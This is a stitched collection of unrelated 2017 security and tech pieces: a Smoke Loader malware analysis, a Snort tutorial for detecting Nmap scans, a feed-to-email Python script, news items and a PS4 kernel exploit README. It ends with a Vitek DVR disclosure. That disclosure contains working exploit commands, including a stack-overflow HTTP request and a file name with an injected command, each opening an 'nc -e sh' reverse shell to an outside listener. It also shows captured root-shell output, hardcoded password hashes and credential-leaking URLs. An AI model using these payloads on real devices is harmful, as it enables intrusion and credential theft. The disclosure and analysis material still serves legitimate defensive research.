Fi8sVrs

Exploit kits are constantly serving up a variety of exploits and payloads to systems across the Internet on a daily basis. In order to prevent their payloads from being easily mitigated, they typically contain many layers of obfuscation and anti-analysis checks. The authors understand that many eyes will have access to their malware and they often put a shell around the final payload to defend against malware analysis, sandbox analysis, and antivirus protection. Smoke Loader is one such shell that uses a Nullsoft script installer package to deploy the initial malware payload. Below are the details of how Smoke Loader infects the system, attempts to evade analysis, and persist on the system. Executive Summary Exploit kits authors make their money by being able to sell the use of their system to many different buyers. In order to do that, they need to be able to protect their final payloads from being easily reversed and defended against. Smoke Loader is a shell that protects the final payload by using multiple layers of injection and hollowing to make analysis difficult. In addition to these layers, they also have active defenses that look for indications that they are running in a virtual machine or being actively analyzed by known security tools. If any of these tools are found they will terminate them to prevent their secrets from being discovered. Once fully installed on the system, Smoke Loader will contact the Command and Control (C2) server to download the arbitrary payload for the exploit kit subscriber. This diagram represents how Smoke loader goes from initial execution to full presence on the system. Figure 1: Process Overview Technical Analysis Delivery Nullsoft is an open source script-based tool for building installers on windows. It is easy to use this wrapper to quickly setup the first stage of the Smoke Loader malware. For this version of Smoke Loader the installer essentially just dropped and executed the first stage of the malware in the %TEMP% folder, which comes in the form of a malicious DLL called fiberboards.dll and a packed file called Lexigraphy.cab. The fiberboards.dll binary will then unpack Lexigraphy.cab, load the necessary libraries and APIs, and launch another copy of the original malware suspended in memory. The now unpacked stage two is mapped into the memory of the new process and is ready to be executed. The fiberboards.dll file then passes execution onto stage two and exits. Injection Junction Stage two is where the fun begins for this sample. This portion of the code contains heavily obfuscated code flow that self-modifies as it is executing. This type of anti-analysis technique can make it very difficult to perform static analysis on the binary. Function calls often go several levels deep and then a new address is pushed onto the stack just before the return in order to re-direct the flow of the code to an entirely different function, never to return. Since this is done dynamically, tools such as IDA are unable to follow the code flow forcing the analyst to step through each function call. Bypassing these type of packers can be time consuming and problematic, especially if there are any kind of anti-debugging tricks that make finding the end of the unpacker difficult. Stepping over a function that seemed unimportant can often result in the malware executing beyond what you expected. Working through this packer, we determined where the next stage was unpacked in memory. This allowed us to set a breakpoint on that location and dump the unpacked malicious code. Once the packer has been bypassed we are now able to more clearly see what the malware is going to do. Crossroads Once the code is unpacked, the final version of the malware is visible to us. There are two paths available depending on the current status of the execution flow. Both paths also share code used to set up required library functions and anti-analysis defenses. Smoke Loader uses a custom hashing algorithm in order to compare various process, libraries, and window names through the program. Here is the algorithm used by this version of Smoke Loader: Figure 2: Hashing Algorithm This allows for hardcoded values to be used by the malware without revealing what names they are actually looking for. Figure 3: Loading Libraries These two hardcoded values (0x421E4440 and 0x44194744) are the hashed representation of the file names ntdll.dll and kernel32.dll respectively. Each loaded library name is hashed until the values match and the address of that library is recorded. Smoke Loader also dynamically loads each API call using this same hashing algorithm. All of this obfuscation further increases the time to statically analyze functions and determine functionality. Once the API calls addresses are stored, Smoke Loader executes two threads that protect the malicious process from active analysis. These threads hash process names running on the system and the names of active windows and compare them against a hardcoded list of hashes that should be terminated. Using the hashing algorithm makes it difficult to determine exactly which analysis tools will be terminated. In order to attempt to determine which tools will be terminated, we reproduced the hashing algorithm in C++ to be able to run different names through the algorithm. Here is a link to the code, which can take a file and hash all the names. While it is difficult to have a full list of window and process names for all things the authors might have wished to detect, the following list are some of the values we were able to determine the binary was looking for and would terminate: Ollydbg Process Hacker Procmon Utilizing the implemented algorithm also made it easier to determine which libraries were going to be loaded, making static analysis of functions quicker. The threads run in a constant loop looking for any of the hardcoded hashes and window class names to be terminated. The final bit of anti-analysis is checking to see if the malware is running on a virtual machine. This is performed by querying the following registry key: HKLMSystemCurrentControlSetServicesDiskEnum Four strings are decoded and checked to see if they are contained in the result. If and of the following strings are detected the malware continuously calls the sleep function: qemu virtual vmware xen ffffcce24 In order to prepare for the next stage, a hash is generated from hardcoded data within the sample and used as the name of a file mapping created with the API CreateFileMappingA: 63CA4449C7E27B984F81F498FCDFC938 This file mapping contains the full path to where the malware is residing on the system. At this point, the malware is ready to move to its final destination: explorer.exe. A new explorer.exe is launched in a suspended state, the code is hollowed out, and the malware copies itself into its new home. Execution is then resumed and transferred to the new process. Let’s Explore Much of the same setup functionality discussed above is re-executed in the new explorer process, ensuring that all the libraries are loaded and the anti-analysis threads are executing. A check is performed to see if the parent process is explorer and if it is, the next phase of the malware executes. The same hash is created as above and the file mapping opened so this stage of the malware can retrieve the location of the original malware. The previous stage will wait until this handle is closed before exiting. Next, Smoke Loader obtains the user agent string for the current version of Internet Explorer installed on the system. In order to verify that the system has a connection to the Internet, it will attempt to contact hxxp://www.bing.com and will continue attempting to connect to this address every sixty seconds until it gets a response. Before moving the original malicious executable to its new location, the computer name and the volume information are retrieved from the system and hashed to serve as a mutex on the infected system. This ensures that there aren’t multiple infections on the current machine while it is being moved to the new location. Smoke Loader then searches through the following registry key looking for any subkeys that have the values HelpLink and URLInfoAbout: HKLMSoftwareMicrosoftWindowsCurrentVersionUninstall Some of this information will be used to look less suspicious when installing persistence on the system further down. An eight character name is generated based on the last eight characters of the unique ID generated above and is used as the future name of the malware. The first 8 characters of the ID are used to generate the random folder name it will be contained in. Here is a visual demonstration of this process: Figure 4: Name Generation Now that the folder and malware name have been generated, the new path for malware is put together: %APPDATA%Microsoftbteurgsdugivagdt.exe The directory is created according to the above location, the malware is copied from its original dropped location to the new malware path, and the original copy is deleted. It will also attempt to delete ugivagdt.exe:Zone.Identifier in the newly created folder. In order to further blend in with the system the folder and the malware file have their attributes changed to system and hidden and both are timestomped using the timestamps from advapi32.dll in the system folder. In order to set up persistence, Smoke Loader uses information taken from the uninstall registry key above and uses it to create a value in the following key: SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun In the case of my analysis machine, Process Hacker 2 was chosen as the target to hide on the system. Figure 5: Persistence This essentially uses policy settings to specify startup programs for the user. Once the persistence is in place, a thread is created that repeatedly checks for the existence of this key. If the key is deleted it will re-create the key to maintain persistence. With the malware fully installed on the system, a thread is launched that performs the remainder of the tasks for Smoke Loader. Are we there yet? This thread contains the functionality for handling whatever type of payload the exploit kit is currently serving up. At the time of this writing, the C2 server was no longer active. Fake traffic is also generated in this thread using the URL taken from the Uninstall key above (hxxp://sourceforge.net/projects/processhacker/support for example on my analysis system). This is done on a random timer and several times in order to look legitimate on the system. Finally, once it has done its best to look legitimate, the C2 server is contacted. From here, additional payloads can be downloaded and executed or injected directly into the process. Additional C2 servers can also be added to the list in order to maintain the ability of Smoke Loader to contact its controllers. Conclusion Exploit kits can deliver potentially thousands of samples across the Internet on a daily basis. Because of the sheer number of eyes that may see their samples, they are often very difficult to analyze. Heavy code obfuscation, anti-analysis, anti-virtualization, and multiple layers of injection and hollowing are common fare for this type of malware. This class of malware can often have new and interesting ways of evading detection in order to retrieve the final payload from another location, which make them worth analyzing in detail. By listing IOC’s and detailing the tactics and techniques used, networks can be better protected from these malicious threats. Indicators Indicator Type Context http://hellobro.bit Domain Command and Control Server 4082bf938715c3d4ca639e47313f991b MD5 Smoke Loader 88048f15b3206de1efd6147bac585be17c84caafd9ac2a0392d4886ce5a148f5 SHA256 Smoke Loader 63CA4449C7E27B984F81F498FCDFC938 File Mapping Source: https://www.cybrary.it/channelcontent/smoke-and-mirrors/

Today we are going to discuss how to Detect NMAP scan using Snort but before moving ahead kindly read our privious both articles releted to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network. Basically in this article we are testing Snort against NMAP various scan which will help network security analyst to setup snort rule in such a way so that they become aware of any kind of NMAP scanning. Requirement Attacker: Kali Linux (NMAP Scan) Target: Ubuntu (Snort as IDS) Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network) Let’s Begins!! Identify NMAP Ping Scan As we know any attacker will start attack by identifying host status by sending ICMP packet using ping scan. Therefore be smart and add a rule in snort which will analyst NMAP Ping scan when someone try to scan your network for identifying live host of network. Execute given below command in ubuntu’s terminal to open snort local rule file in text editor. sudo gedit /etc/snort/rules/local.rules Now add given below line which will capture the incoming traffic coming on 192.168.1.105(ubuntu IP) network for ICMP protocol. alert icmp any any -> 192.168.1.105 any (msg: “NMAP ping sweep Scan “; dsize:0;sid:10000004; rev: 1;) Turn on IDS mode of snort by executing given below command in terminal: sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0 Now using attacking machine execute given below command to identify status of target maching i.e. host is UP or Down. nmap -sP 192.168.1.105 –disable-arp-ping If you will execute above command without parameter “disable arp-ping” then will work as default ping sweep scan which will send arp packets inspite of sending ICMP on targets network and may be snort not able to capture NMAP Ping scan in that sinario, therefore we had use parameter “disable arp-ping” in above command. As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends form attacker network to targets network. Hence in given below image you can notice ICMP request packet as well as ICMP reply packets both are part of network traffic. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Ping Sweep scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP TCP Scan Now in order to connect with target network, attacker may go with networking enumeration either using TCP Protocol or UDP protocol. Let assume attacker may choose TCP scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg: “NMAP TCP Scan”; sid:10000005; rev:2; ) Above rule is only applicable for port 22 so if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for TCP scan on port 22. nmap -sT -p22 192.168.1.105 From given below image you can observe wireshark has captured TCP packets from 192.168.1.104 to 192.168.1.105 Here you can confirm that our snort is absolutely working when attacker is scanning port 22 using nmap TCP scan and it is showing attacker’s IP from where traffic is coming on port 22. Hence you can block this IP to protect your network from further scanning. Identify NMAP XMAS Scan As we know that TCP communication follows three way handshake to established TCP connection with target machine but sometimes instead of using SYN, SYN/ACK,ACK flag attacker choose XMAS scan to connect with target by sending data packets through Fin, PSH & URG flags. Let assume attacker may choose XMAS scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg:”Nmap XMAS Tree Scan”; flags:FPU; sid:1000006; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin, PSH & URG flags .So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for XMAS scan on port 22. nmap -sX -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN, PSH, URG flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP XMAP scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP FIN Scan Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose FIN scan to connect with target by sending data packets through Fin flags only. Let assume attacker may choose FIN scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.1045 22 (msg:”Nmap FIN Scan”; flags:F; sid:1000008; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for FIN scan on port 22. nmap -sF -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP FIN scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP NULL Scan Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose NULL scan to connect with target by sending data packets through NONE flags only. Let assume attacker may choose NULL scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg:”Nmap NULL Scan”; flags:0; sid:1000009; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for NULL scan on port 22. nmap -sN -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using NONE flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Null scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP UDP Scan In order to Identify open UDP port and running services attacker may chose NMAP UDP scan to establish connection with target machine for network enumeration then in that situation we can apply following rule in snort local rule file. alert UDP any any -> 192.168.1.105 any(msg:”Nmap UDPScan”; sid:1000010; rev:1;) Again above rule is applicable for every UDP port which will listen for incoming traffic when packets is coming over any UDP port, so if you want to capture traffic for any particular UDP port then replace “any” from that specific port number as done above. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for NULL scan on port 22. nmap -sU -p68 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send over UDP Port. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP UDP scan. Hence you can block attacker’s IP to protect your network from further scanning. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Source: http://www.hackingarticles.in/detect-nmap-scan-using-snort/

feed2email Send RSS/Atom feeds to e-mail requirements.txt feedparser==5.2.1 feed2email.py #!/usr/bin/env python3 # vim: set ai et ts=4 sw=4: # feed2email.py # (c) Aleksander Alekseev 2016-2017 # http://eax.me/ import feedparser from smtplib import SMTP # from smtplib import SMTP_SSL as SMTP from email.mime.text import MIMEText from contextlib import contextmanager import signal import getpass import hashlib import time import sys import re server = 'smtp.yandex.ru' port = 587 # 25 login = "YOUR_SENDER_LOGIN" from_addr = "NEWS <YOUR_SENDER_LOGIN@yandex.ru>" receiver = "YOUR_EMAIL" processed_urls_fname = "processed-urls.txt" feed_list_fname = "feed-list.txt" # change to True before first run or you will receive A LOT of emails # then change back to False fake_send = False sleep_time = 60*5 # seconds net_timeout = 20 # seconds smtp_retry_time = 30 # seconds smtp_retries_num = 5 # >>> import hashlib # >>> hashlib.sha1(b"qwerty").hexdigest() # 'b1b3773a05c0ed0176787a4f1574ff0075f7521e' pwhash = 'YOUR_PASSWORD_SHA1_HASH' # FUNCS class TimeoutException(Exception): pass @contextmanager def timeout_sec(seconds): def signal_handler(signum, frame): raise TimeoutException(Exception("Timed out!")) signal.signal(signal.SIGALRM, signal_handler) signal.alarm(seconds) try: yield finally: signal.alarm(0) def file_to_list(fname): rslt = [] with open(fname, "r") as f: rslt = [x for x in f.read().split("\n") if x.strip() != "" ] return rslt # MAIN password = getpass.getpass("SMTP Password: ") if hashlib.sha1(bytearray(password, 'utf-8')).hexdigest() != pwhash: print("Invalid password", file = sys.stderr) sys.exit(1) while True: feed_list = file_to_list(feed_list_fname) # filter comments feed_list = [ x for x in feed_list if not re.match("(?i)\s*#", x) ] keep_urls = 1000*len(feed_list) processed_urls = [] try: processed_urls = file_to_list(processed_urls_fname) except FileNotFoundError: pass print("Processing {} feeds...".format(len(feed_list))) for feed in feed_list: print(feed) f = None try: with timeout_sec(net_timeout): f = feedparser.parse(feed) except TimeoutException: print("ERROR: Timeout!") continue feed_title = f['feed'].get('title', '(NO TITLE)') feed_link = f['feed'].get('link', '(NO LINK)') for entry in f['entries']: if entry['link'] in processed_urls: continue subject = "{title} | {feed_title} ({feed_link})".format( title = entry.get('title', '(NO TITLE'), feed_title = feed_title, feed_link = feed_link ) print(subject) summary = entry.get('summary', '(NO SUMMARY)') body = "{summary}\n\n{link}\n\nSource feed: {feed}".format( summary = summary[:256], link = entry['link'], feed = feed ) print(body) print("-------") msg = MIMEText(body, 'plain') msg['Subject'] = subject msg['From'] = from_addr msg['To'] = receiver if not fake_send: for attempt in range(1, smtp_retries_num+1): try: with timeout_sec(net_timeout), SMTP(server, port) as conn: conn.starttls() conn.login(login, password) conn.sendmail(from_addr, [receiver], msg.as_string()) break except Exception as exc: print(("Failed to send email {}/{} - {}, " + "retrying in {} seconds").format( attempt, smtp_retries_num, exc, smtp_retry_time ) ) time.sleep(smtp_retry_time) processed_urls = [ entry['link'] ] + processed_urls with open(processed_urls_fname, "w") as urls_file: urls_file.write("\n".join(processed_urls[:keep_urls])) print("Sleeping {} seconds...".format(sleep_time)) time.sleep(sleep_time) Download: feed2email-master.zip Source: https://github.com/afiskon/feed2email

da.

In 2015, artist Ai Weiwei was bugged in his home, presumably by government actors. This situation raised our awareness on the lack of research in our community about operating and detecting spying microphones. Our biggest concern was that most of the knowledge came from fictional movies. Therefore, we performed a deep study on the state-of-the-art of microphone bugs, their characteristics, features and pitfalls. It included real life experiments trying to bug ourselves and trying to detect the hidden mics. Given the lack of open detection tools, we developed a free software SDR-based program, called Salamandra, to detect and locate hidden microphones in a room. After more than 120 experiments we concluded that placing mics correctly and listening is not an easy task, but it has a huge payoff when it works. Also, most mics can be detected easily with the correct tools (with some exceptions on GSM mics). In our experiments the average time to locate the mics in a room was 15 minutes. Locating mics is the novel feature of Salamandra, which is released to the public with this work. We hope that our study raises awareness on the possibility of being bugged by a powerful actor and the countermeasure tools available for our protection. Video: https://media.ccc.de/v/34c3-8735-spy_vs_spy_a_modern_study_of_microphone_bugs_operation_and_detection#video&t=0

Leaky RootsWeb Server Exposes Some Ancestry.com User Data Ancestry.com said it closed portions of its community-driven genealogy site RootsWeb as it investigated a leaky server that exposed 300,000 passwords, email addresses and usernames to the public internet. In a statement issued over the weekend, Chief Information Security Officer of Ancestry.com Tony Blackham said a file containing the user data was publicly exposed on a RootsWeb server. On Wednesday, Ancestry.com told Threatpost it believed the data was exposed on November 2015. The data resided on RootsWeb’s infrastructure, and is not linked to Ancestry.com’s site and services. Ancestry.com said RootsWeb has “millions” of members who use the site to share family trees, post user-contributed databases and host thousands of messaging boards. The company said RootsWeb doesn’t host sensitive information such as credit card data or social security numbers. It added, there are no indications data exposed to the public internet has been accessed by a malicious third party. The company declined to specify how and why the data was stored insecurely on the server. The exposure of data was first brought to Ancestry.com’s attention on Dec. 20 when Troy Hunt, who runs the data breach repository HaveIBeenPwned.com, reported to the company the existence of the file on RootsWeb’s server. According to a tweet by Hunt the publicly exposed data contained plain text passwords. The company said as it investigates some of RootsWeb’s services would be taken offline. On Wednesday, visitors were greeted with the message: Customers were told as a result of some sections of RootsWeb being taken offline it “may not be able to salvage everything” as Ancestry.com works to resolve this issue and “improve the site’s infrastructure.” Ancestry.com declined to say how long the site would have limited functionality. However, in a comment section of Ancestry.com a company representative told a customer: “We do not have a specific timeline at this point. We hope it will take no more than a few weeks to resolve these issues.” Blackham said 55,000 impacted accounts will be “locked” and users trying to access them will be forced to create a new password. Affected users will also be notified by email of the user data exposure. Over the past several days RootsWeb users have peppered Blackham’s security update blog post with passionate requests to preserve user data and return functionality. Ancestry.com joins a long list of companies that have fallen victim to a leaky server that has inadvertently exposed sensitive company information to the public internet in 2017. Via threatpost.com

# PS4 4.05 Kernel Exploit --- ## Summary In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival. You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days). ## Patches Included The following patches are made by default in the kernel ROP chain: 1) Disable kernel write protection 2) Allow RWX (read-write-execute) memory mapping 3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process 4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode 5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation. ## Notes - This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. - I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads. - A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel. - An SDK is not provided in this release, however a barebones one to get started with may be released at a later date. - I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox. ## Contributors I was not alone in this exploit's development, and would like to thank those who helped me along the way below. - [qwertyoruiopz](https://twitter.com/qwertyoruiopz) - [Flatz](https://twitter.com/flat_z) - [CTurt](https://twitter.com/CTurtE) - Anonymous E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip Source: exploit-db.com

Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukranian capital of Kiev. According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the Stepan Bandera Avenue). Unknown kidnappers in dark clothes and balaclavas dragged Lerner in their black Mercedes-Benz Vito brand (state number AA 2063 MT) car and drove away in an unknown direction. The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped. Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations. Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments. Law enforcers in Kiev have begun an investigation and are currently conducting search operation, working out all possible leads in the case which is described as the kidnapping. EXMO's representatives confirmed media reports in a statement to a local crypto journal BitNovosti and appealed for any information that could lead to the finding of Lerner. The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data. Lerner case has been considered to be yet another case involving a Russian national with cryptocurrency background. In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. The Greece court in October also ruled to extradite Vinnik to the United States. The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin. Via thehackernews.com

Vitek suffers from remote code execution and information disclosure vulnerabilities. [STX] Subject: Vitek RCE and Information Disclosure (and possible other OEM) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 22, 2017 Full Disclosure: 0-day heap: Executable + Non-ASLR stack: Executable + ASLR -[Manufacture Logo]- _ _ _ _ _ _ _ _ _ _ _ _ \ _ _ _ _ _ ___ / /__/ \ |_/ / __ / - _ ___ / / / / / / _ _ _ _/ / / \_/ \_ ______ ___________\___\__________________ -[OEM (found in the code)]- Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R Thrive Wisecon Sanyo Inodic CBC Elbex Y3K KTNC -[Stack Overflow RCE]- [Reverse netcat shell] $ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81 [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:36356. pwd /opt/fw whoami root exit $ Note: 1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20 2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4] 3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0 H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6 .rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001CD138 SUB R3, R11, #0x74 .text:001CD13C MOV R0, R3 .text:001CD140 BL system H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R .rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:00114AC8 SUB R3, R11, #0x74 .text:00114ACC MOV R0, R3 .text:00114AD0 BL system N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6 .rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001E9F0C SUB R3, R11, #0x74 .text:001E9F10 MOV R0, R3 .text:001E9F14 BL system -[PHP RCE]- Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted) [Reverse netcat shell (forking)] $ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST 200 OK [...] > ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody> [...] [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:52726. pwd /opt/www/htdocs/system whoami nobody ls -l /mnt/usb2/ total 4 drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr -rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}|| exit $ -[Login / Password Disclosure]- curl -v "http://192.168.57.20:80/menu.env" | hexdump -C [binary config, login and password can be found for admin login and all connected cameras] Admin l/p [...] 00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................| 00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......| 000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12| 00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............| 00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| Cameras l/p [...] 00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................| 00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........| 00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........| 00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................| 00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root| 00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass| 00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| -[Hardcode l/p]- FTP: TCP/10021 TELNET: TCP/10023 /etc/passwd root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh -[Korean hardcoded DNS]- $ cat /etc/resolv.conf nameserver 168.126.63.1 nameserver 0.0.0.0 nameserver 0.0.0.0 $ $ nslookup 168.126.63.1 1.63.126.168.in-addr.arpa name = kns.kornet.net. $ nslookup 168.126.63.2 2.63.126.168.in-addr.arpa name = kns2.kornet.net. -[Other Information Disclosure]- curl -v "http://192.168.57.20:80/webviewer/netinfo.dat" 192,168,57,20 192,168,2,100 00:0A:2F:XX:XX:XX 00:0A:2F:YY:YY:YY 255.255.255.0 192.168.57.1 -[MAC Address Details]- Company: Artnix Inc. Address: Seoul 137-819, KOREA, REPUBLIC OF Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF Type: IEEE MA-L curl -v "http://192.168.57.20:80/webviewer/gw.dat" Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0 curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0" Change GUI Language to English 